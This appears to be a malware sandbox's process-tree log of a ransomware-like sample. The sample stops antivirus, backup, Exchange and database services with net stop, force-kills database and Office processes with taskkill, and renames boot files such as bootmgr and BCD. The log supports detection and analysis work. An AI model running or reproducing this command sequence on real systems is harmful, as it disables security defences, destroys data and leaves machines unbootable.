C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop audioendpointbuilder /y4⤵
-
C:\Windows\system32\net.exenet stop audioendpointbuilder /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeES /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeES /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeIS /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeIS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeMGMT /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeMGMT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeMTA /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeMTA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeSA /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeSA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSExchangeSRS /y4⤵
-
C:\Windows\system32\net.exenet stop MSExchangeSRS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop msexchangeadtopology /y4⤵
-
C:\Windows\system32\net.exenet stop msexchangeadtopology /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop msexchangeimap4 /y4⤵
-
C:\Windows\system32\net.exenet stop msexchangeimap4 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Agent" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos AutoUpdate Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Clean Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Device Control Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos File Scanner Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Health Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos MCS Agent" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos MCS Client" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Message Router" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Safestore Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos System Protection Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service" /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Sophos Web Control Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop AcronisAgent /y4⤵
-
C:\Windows\system32\net.exenet stop AcronisAgent /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop Antivirus /y’4⤵
-
C:\Windows\system32\net.exenet stop Antivirus /y’5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y’6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop AVP /y4⤵
-
C:\Windows\system32\net.exenet stop AVP /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop DCAgent /y4⤵
-
C:\Windows\system32\net.exenet stop DCAgent /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop EhttpSrv /y4⤵
-
C:\Windows\system32\net.exenet stop EhttpSrv /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ekrn /y4⤵
-
C:\Windows\system32\net.exenet stop ekrn /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop EPSecurityService /y4⤵
-
C:\Windows\system32\net.exenet stop EPSecurityService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop EPUpdateService /y4⤵
-
C:\Windows\system32\net.exenet stop EPUpdateService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop EsgShKernel /y4⤵
-
C:\Windows\system32\net.exenet stop EsgShKernel /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ESHASRV /y4⤵
-
C:\Windows\system32\net.exenet stop ESHASRV /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop FA_Scheduler /y4⤵
-
C:\Windows\system32\net.exenet stop FA_Scheduler /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop IMAP4Svc /y4⤵
-
C:\Windows\system32\net.exenet stop IMAP4Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop KAVFS /y4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop KAVFSGT /y4⤵
-
C:\Windows\system32\net.exenet stop KAVFSGT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop stop kavfsslp /y4⤵
-
C:\Windows\system32\net.exenet stop stop kavfsslp /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stop kavfsslp /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop klnagent /y4⤵
-
C:\Windows\system32\net.exenet stop klnagent /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop macmnsvc /y4⤵
-
C:\Windows\system32\net.exenet stop macmnsvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop masvc /y4⤵
-
C:\Windows\system32\net.exenet stop masvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MBAMService /y4⤵
-
C:\Windows\system32\net.exenet stop MBAMService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MBEndpointAgent /y4⤵
-
C:\Windows\system32\net.exenet stop MBEndpointAgent /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop McAfeeEngineService /y4⤵
-
C:\Windows\system32\net.exenet stop McAfeeEngineService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop McAfeeFramework /y4⤵
-
C:\Windows\system32\net.exenet stop McAfeeFramework /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop McAfeeFrameworkMcAfeeFramework /y4⤵
-
C:\Windows\system32\net.exenet stop McAfeeFrameworkMcAfeeFramework /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop McShield /y4⤵
-
C:\Windows\system32\net.exenet stop McShield /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop McTaskManager /y4⤵
-
C:\Windows\system32\net.exenet stop McTaskManager /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop mfefire /y4⤵
-
C:\Windows\system32\net.exenet stop mfefire /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop mfemms /y4⤵
-
C:\Windows\system32\net.exenet stop mfemms /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop mfevtp /y4⤵
-
C:\Windows\system32\net.exenet stop mfevtp /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SOPHOS /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SOPHOS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop sacsvr /y4⤵
-
C:\Windows\system32\net.exenet stop sacsvr /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y6⤵
-
C:\Windows\system32\taskkill.exetaskkill /im ocssd.exe /F7⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SAVAdminService /y4⤵
-
C:\Windows\system32\net.exenet stop SAVAdminService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SAVService /y4⤵
-
C:\Windows\system32\net.exenet stop SAVService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop stop SepMasterService /y4⤵
-
C:\Windows\system32\net.exenet stop stop SepMasterService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stop SepMasterService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ShMonitor /y4⤵
-
C:\Windows\system32\net.exenet stop ShMonitor /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop Smcinst /y4⤵
-
C:\Windows\system32\net.exenet stop Smcinst /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SmcService /y4⤵
-
C:\Windows\system32\net.exenet stop SmcService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SntpService /y4⤵
-
C:\Windows\system32\net.exenet stop SntpService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop sophossps /y4⤵
-
C:\Windows\system32\net.exenet stop sophossps /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SOPH4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SOPH5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPH6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop svcGenericHost /y4⤵
-
C:\Windows\system32\net.exenet stop svcGenericHost /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop swi_filter /y4⤵
-
C:\Windows\system32\net.exenet stop swi_filter /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop swi_service /y4⤵
-
C:\Windows\system32\net.exenet stop swi_service /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop swi_update /y4⤵
-
C:\Windows\system32\net.exenet stop swi_update /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop swi_update_64 /y4⤵
-
C:\Windows\system32\net.exenet stop swi_update_64 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop TmCCSF /y4⤵
-
C:\Windows\system32\net.exenet stop TmCCSF /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop tmlisten /y4⤵
-
C:\Windows\system32\net.exenet stop tmlisten /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop TrueKey /y4⤵
-
C:\Windows\system32\net.exenet stop TrueKey /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop TrueKeyScheduler /y4⤵
-
C:\Windows\system32\net.exenet stop TrueKeyScheduler /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop TrueKeyServiceHel4⤵
-
C:\Windows\system32\net.exenet stop TrueKeyServiceHel5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHel6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop WRSVC /y4⤵
-
C:\Windows\system32\net.exenet stop WRSVC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop vapiendpoint /y4⤵
-
C:\Windows\system32\net.exenet stop vapiendpoint /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im savfmsesp.exe /f4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im savfmsesp.exe /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im sqbcoreservice.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im sqbcoreservice.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im sqbcoreservice.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im sqbcoreservice.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im zoolz.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im zoolz.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im firefoxconfig.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im firefoxconfig.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im tbirdconfig.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im tbirdconfig.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im thunderbird.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im thunderbird.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im agntsvc.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im agntsvc.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im dbeng50.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im dbeng50.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im dbsnmp.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im dbsnmp.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im isqlplussvc.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im isqlplussvc.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im msaccess.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im msaccess.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im msftesql.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im msftesql.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mydesktopqos.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mydesktopqos.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mydesktopservice.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mydesktopservice.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mysqld-nt.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mysqld-nt.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mysqld-opt.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mysqld-opt.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mysqld.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mysqld.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im ocautoupds.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im ocautoupds.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im ocssd.exe /F4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im oracle.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im oracle.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im sqlagent.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im sqlagent.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im sqlbrowser.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im sqlbrowser.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im sqlservr.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im sqlservr.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im synctime.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im synctime.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im thebat.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im thebat.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im thebat64.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im thebat64.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im encsvc.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im encsvc.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im ocomm.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im ocomm.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im xfssvccon.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im xfssvccon.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im excel.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im excel.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im infopath.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im infopath.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im mspub.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im mspub.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im onenote.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im onenote.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im outlook.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im outlook.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im powerpnt.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im powerpnt.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im visio.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im visio.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im winword.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im winword.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /im wordpad.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /im wordpad.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM CNTAoSMgr.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM CNTAoSMgr.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM mbamtray.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mbamtray.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM Ntrtsc4⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM Ntrtsc5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM PccNTMon.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM PccNTMon.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM tmlisten.exe /F4⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM tmlisten.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\BOOTNXT""" """C:\\BOOTNXT.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\bootmgr""" """C:\\bootmgr.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\BCD""" """C:\\Boot\BCD.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\BOOTSECT.BAK""" """C:\\BOOTSECT.BAK.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini""" """C:\\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\BCD.LOG""" """C:\\Boot\BCD.LOG.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\pagefile.sys""" """C:\\pagefile.sys.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\odt\config.xml""" """C:\\odt\config.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\BCD.LOG2""" """C:\\Boot\BCD.LOG2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\BCD.LOG1""" """C:\\Boot\BCD.LOG1.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\bg-BG\bootmgr.exe.mui""" """C:\\Boot\bg-BG\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\swapfile.sys""" """C:\\swapfile.sys.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ClearConvertTo.temp""" """C:\\Program Files\ClearConvertTo.temp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\CheckpointMount.m4v""" """C:\\Program Files\CheckpointMount.m4v.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\ClearEnter.MTS""" """C:\\Program Files\ClearEnter.MTS.back_up"""4⤵
-
